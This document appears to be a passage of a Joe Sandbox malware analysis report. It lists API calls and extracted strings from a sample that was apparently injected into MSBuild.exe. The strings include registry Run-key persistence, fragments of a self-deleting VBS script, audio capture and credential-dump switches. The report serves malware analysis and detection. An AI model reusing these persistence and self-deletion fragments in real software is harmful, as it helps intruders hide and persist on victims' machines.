                                                • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                  • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                  • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
                                                  • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
                                                  • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C
                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                • API String ID: 4250697656-2665858469
                                                • Opcode ID: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
                                                • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                • Opcode Fuzzy Hash: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
                                                • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                Function 0040C28E Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 282registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                  • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                • ExitProcess.KERNEL32 ref: 0040C63E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                • API String ID: 1861856835-3168347843
                                                • Opcode ID: 1fca09a02b8493e53294f51d4634f72964b40bbef437048ec22e150e28ca3ccf
                                                • Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
                                                • Opcode Fuzzy Hash: 1fca09a02b8493e53294f51d4634f72964b40bbef437048ec22e150e28ca3ccf
                                                • Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                                                Function 0040BF04 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 260registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                  • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                • ExitProcess.KERNEL32 ref: 0040C287
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                • API String ID: 3797177996-1998216422
                                                • Opcode ID: c4cc4d00899e4284936be169aaff6719d95b62d3fffb22ecd15678fbb4326d45
                                                • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                • Opcode Fuzzy Hash: c4cc4d00899e4284936be169aaff6719d95b62d3fffb22ecd15678fbb4326d45
                                                • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                Function 0041A1BB Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                • SetEvent.KERNEL32 ref: 0041A38A
                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                • CloseHandle.KERNEL32 ref: 0041A3AB
                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                • API String ID: 738084811-1408154895
                                                • Opcode ID: c362ced5fa98a12e984468584ff4096b6ed47b7628e845a56c9a339ad7c4d382
                                                • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                • Opcode Fuzzy Hash: c362ced5fa98a12e984468584ff4096b6ed47b7628e845a56c9a339ad7c4d382
                                                • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Write$Create
                                                • String ID: RIFF$WAVE$data$fmt
                                                • API String ID: 1602526932-4212202414
                                                • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                • API String ID: 1646373207-89630625
                                                • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _wcslen.LIBCMT ref: 0040BC75
                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                • _wcslen.LIBCMT ref: 0040BD54
                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000000,00000000), ref: 0040BDF2
                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                • _wcslen.LIBCMT ref: 0040BE34
                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                • ExitProcess.KERNEL32 ref: 0040BED0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$del$open$BG$BG
                                                • API String ID: 1579085052-1088133900
                                                • Opcode ID: 8a4e8abcb5692669c638f214cb972068405fdb8eb26e88a62148626bb00c57e2
                                                • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                • Opcode Fuzzy Hash: 8a4e8abcb5692669c638f214cb972068405fdb8eb26e88a62148626bb00c57e2
                                                • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                Function 0041B1BB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                • lstrlenW.KERNEL32(?), ref: 0041B207
                                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                • _wcslen.LIBCMT ref: 0041B2DB
                                                • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                • GetLastError.KERNEL32 ref: 0041B313
                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                • GetLastError.KERNEL32 ref: 0041B370
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                • String ID: ?
                                                • API String ID: 3941738427-1684325040
                                                • Opcode ID: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                • Opcode Fuzzy Hash: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                Function 0044E20E Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$EnvironmentVariable$_wcschr
                                                • String ID:
                                                • API String ID: 3899193279-0
                                                • Opcode ID: f97f98dd34153332c2010fb65b1131a463ec8f76e6cba2d9c1c767644d430276
                                                • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                • Opcode Fuzzy Hash: f97f98dd34153332c2010fb65b1131a463ec8f76e6cba2d9c1c767644d430276
                                                • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                Function 00411C81 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479sleepfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                • Sleep.KERNEL32(00000064), ref: 00412060
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                • String ID: /stext "$HDG$HDG$>G$>G
                                                • API String ID: 1223786279-3931108886
                                                • Opcode ID: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                • Opcode Fuzzy Hash: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                Function 00413E37 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                • API String ID: 2490988753-744132762
                                                • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                Function 0041B824 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                                                • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                • API String ID: 1332880857-3714951968
                                                • Opcode ID: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                                                • Opcode Fuzzy Hash: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                                                Function 0041CA9E Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                • GetCursorPos.USER32(?), ref: 0041CAF8
                                                • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                • ExitProcess.KERNEL32 ref: 0041CB74
                                                • CreatePopupMenu.USER32 ref: 0041CB7A
                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                • String ID: Close
                                                • API String ID: 1657328048-3535843008
                                                • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                Function 00444F3D Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$Info
                                                • String ID:
                                                • API String ID: 2509303402-0
                                                • Opcode ID: 06a8a26f2c5a7b5fa394c6bff13e2c454eae2c5b2dbf51852f12c512b58d3eba
                                                • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                • Opcode Fuzzy Hash: 06a8a26f2c5a7b5fa394c6bff13e2c454eae2c5b2dbf51852f12c512b58d3eba
                                                • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
